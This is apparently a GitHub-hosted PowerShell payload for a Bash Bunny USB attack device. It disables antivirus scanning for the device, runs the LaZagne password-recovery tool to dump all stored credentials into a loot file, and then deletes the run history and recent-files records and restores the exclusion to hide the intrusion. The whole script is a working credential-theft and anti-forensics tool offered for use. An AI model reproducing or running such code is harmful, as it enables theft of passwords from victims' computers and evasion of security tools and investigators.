-
Notifications
You must be signed in to change notification settings - Fork 3
/
LaZassword.ps1
54 lines (36 loc) · 1.93 KB
/
LaZassword.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#############################################
# CONFIGURATION #
#############################################
# Define ExeArguments here (all -vv is default):
$ExeArgs = "all -vv"
# Define loot folder name here (hostname_LaZagne is default):
$foldername = "$env:computername" + "_LaZagne"
# Define loot file name here (hostname is default):
$filename = "$env:computername"
#######################################################
# PAYLOAD #
#######################################################
# Define variable for the driveletter of the BashBunny
$BashBunnyLabel = (gwmi -class win32_volume -f {label = "BASHBUNNY"}).DriveLetter
# Add antivirus exclusion for the whole BashBunny
Add-MpPreference -ExclusionPath "$BashBunnyLabel"
# Unzip lazagne.zip
Expand-Archive -Force $BashBunnyLabel\LaZagne.zip $BashBunnyLabel\LaZagne
# Define variable for the path to LaZagne + execution arguments
$LaZagnePath = $BashBunnyLabel\LaZagne\LaZagne.exe $ExeArgs
# Create the loot folder in the "\loot\LaZassword\" directory
New-Item -ItemType Directory -Force -Path $BashBunnyLabel\loot\LaZassword\$foldername
# Define variable for the loot file
$lootfile = "$BashBunnyLabel\loot\lazassword\$foldername\$filename.txt"
# Execute LaZagne and save the output in the loot file
Invoke-Expression $LaZagnePath | Out-File -FilePath $lootfile
# Delete the run (win+r) history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Remove the unzipped LaZagne folder
Remove-Item "$BashBunnyLabel\LaZagne\" -recurse
# Remove the antivirus exclusion for the BashBunny
Remove-MpPreference -ExclusionPath "$BashBunnyLabel"
# Delete the "recent files" reference
Get-ChildItem -Path C:\Users\\$env:UserName\AppData\Roaming\Microsoft\Windows\Recent -Include * -File -Recurse | foreach { $_.Delete()}
# Send the finished message to the BashBunny
\\172.16.64.1\LaZassword